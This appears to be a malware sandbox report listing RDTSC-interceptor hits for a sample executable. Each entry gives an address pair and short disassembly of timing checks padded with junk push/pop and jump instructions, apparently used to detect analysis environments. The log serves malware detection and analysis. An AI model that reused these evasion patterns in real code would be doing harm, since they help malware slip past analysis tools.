Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772839 second address: 177283D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177283D second address: 1772841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772841 second address: 1772847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772847 second address: 1772858 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB1F6DCh 0x00000008 jbe 00007FEEDCB1F6D6h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772E3F second address: 1772E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772E57 second address: 1772E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17730FB second address: 1773103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773103 second address: 1773130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FEEDCB1F6E9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773130 second address: 1773135 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773426 second address: 1773446 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FEEDCB1F6D6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773446 second address: 1773461 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 jbe 00007FEEDCB2F2F4h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773746 second address: 177374D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177374D second address: 1773766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2EEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17739EF second address: 17739F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17739F9 second address: 1773A03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1773A03 second address: 1773A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17794E8 second address: 17794F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEEDCB2F2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177C4CD second address: 177C4F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E0h 0x00000007 jmp 00007FEEDCB1F6DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FEEDCB1F6DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177C4F3 second address: 177C50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007FEEDCB2F2E6h 0x0000000c jmp 00007FEEDCB2F2F0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CAC0 second address: 177CAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CE9D second address: 177CEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CEA1 second address: 177CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177CEA7 second address: 177CEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FEEDCB2F2E6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784310 second address: 1784314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784314 second address: 178432F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F6h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17845DD second address: 17845FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEEDCB1F6E8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784738 second address: 1784759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007FEEDCB2F2EDh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784759 second address: 178475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848A2 second address: 17848C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FEEDCB2F2F2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848C3 second address: 17848E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEDCB1F6D6h 0x0000000a jmp 00007FEEDCB1F6E5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848E2 second address: 17848EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17848EA second address: 17848F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEDCB1F6D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1784A43 second address: 1784A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1785127 second address: 178512D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178580F second address: 1785813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1785813 second address: 1785827 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FEEDCB1F6D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0D5 second address: 178D0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0E7 second address: 178D0ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D0ED second address: 178D0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3D8 second address: 178D3E2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB1F6D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3E2 second address: 178D3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 178D3E8 second address: 178D404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179950D second address: 1799511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1799511 second address: 179952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEDCB1F6E8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179952F second address: 1799536 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1799536 second address: 179953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 179BC7F second address: 179BC8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17AB4A8 second address: 17AB4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17AB4AC second address: 17AB4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FEEDCB2F2F9h 0x0000000a jmp 00007FEEDCB2F2ECh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FEEDCB2F2EDh 0x00000018 jmp 00007FEEDCB2F2F4h 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CF3 second address: 17B2CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CF7 second address: 17B2CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2CFD second address: 17B2D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17B2D08 second address: 17B2D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB201 second address: 17BB205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB205 second address: 17BB21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB21B second address: 17BB233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB233 second address: 17BB237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB7D2 second address: 17BB7F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEEDCB1F6D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB1F6DFh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB7F1 second address: 17BB817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB2F2F1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB817 second address: 17BB853 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6E0h 0x00000008 pushad 0x00000009 jmp 00007FEEDCB1F6E0h 0x0000000e jmp 00007FEEDCB1F6E5h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9C3 second address: 17BB9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FEEDCB2F2E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9D8 second address: 17BB9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BB9DC second address: 17BB9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17BBB04 second address: 17BBB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E6h 0x00000009 popad 0x0000000a jmp 00007FEEDCB1F6E8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17C0E0C second address: 17C0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17C0B70 second address: 17C0B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEDCB1F6E1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17FF088 second address: 17FF08E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17FF08E second address: 17FF094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007A1 second address: 18007B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FEEDCB2F2ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007B2 second address: 18007BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FEEDCB1F6D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18007BD second address: 18007EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEDCB2F2EFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60D7 second address: 16C60E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FEEDCB1F6D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18088C9 second address: 18088EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FEEDCB2F2F5h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18088EE second address: 1808904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEDCB1F6DDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1808904 second address: 180890A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1819E93 second address: 1819E99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E90D9 second address: 18E90EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E8059 second address: 18E808A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FEEDCB1F6E6h 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jne 00007FEEDCB1F6DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E808A second address: 18E8090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E8090 second address: 18E8094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E81E1 second address: 18E81ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007FEEDCB2F2E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18E89D1 second address: 18E89D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18ED33A second address: 18ED355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 18ED355 second address: 18ED35A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70100A9 second address: 70100BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1E0AA822h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70100BB second address: 70101A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007FEEDCB1F6E7h 0x0000000a pushfd 0x0000000b jmp 00007FEEDCB1F6E8h 0x00000010 and eax, 715F0318h 0x00000016 jmp 00007FEEDCB1F6DBh 0x0000001b popfd 0x0000001c pop ecx 0x0000001d popad 0x0000001e push edx 0x0000001f jmp 00007FEEDCB1F6E4h 0x00000024 mov dword ptr [esp], ebx 0x00000027 pushad 0x00000028 call 00007FEEDCB1F6DEh 0x0000002d pushfd 0x0000002e jmp 00007FEEDCB1F6E2h 0x00000033 and eax, 12D987D8h 0x00000039 jmp 00007FEEDCB1F6DBh 0x0000003e popfd 0x0000003f pop esi 0x00000040 pushfd 0x00000041 jmp 00007FEEDCB1F6E9h 0x00000046 adc ecx, 0CD4FF76h 0x0000004c jmp 00007FEEDCB1F6E1h 0x00000051 popfd 0x00000052 popad 0x00000053 mov ebx, dword ptr [eax+10h] 0x00000056 jmp 00007FEEDCB1F6DEh 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d movzx ecx, bx 0x00000060 movsx edx, cx 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101A5 second address: 70101AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101AB second address: 70101B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B1 second address: 70101B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B5 second address: 70101B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
